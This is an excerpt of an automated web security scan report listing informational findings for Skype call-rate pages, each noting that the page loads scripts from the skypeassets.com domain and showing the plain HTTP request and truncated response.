   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.775. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tonga  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-tonga

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-tonga HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.776. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-trinidad-and-tobago  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-trinidad-and-tobago

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-trinidad-and-tobago HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.777. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tunisia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-tunisia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-tunisia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.778. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-turkey

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-turkey HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.779. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkmenistan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-turkmenistan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-turkmenistan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.780. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turks-and-caicos-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-turks-and-caicos-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-turks-and-caicos-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.781. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tuvalu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-tuvalu

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-tuvalu HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.782. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uganda  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-uganda

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-uganda HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.783. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ukraine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-ukraine

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-ukraine HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:10 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.784. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-arab-emirates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-united-arab-emirates

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-united-arab-emirates HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:10 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.785. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-kingdom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-united-kingdom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-united-kingdom HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 51304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.786. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-states  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-united-states

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-united-states HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.787. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uruguay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-uruguay

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-uruguay HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:11 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.788. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-us-virgin-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-us-virgin-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-us-virgin-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:14 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.789. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uzbekistan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-uzbekistan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-uzbekistan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:11 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
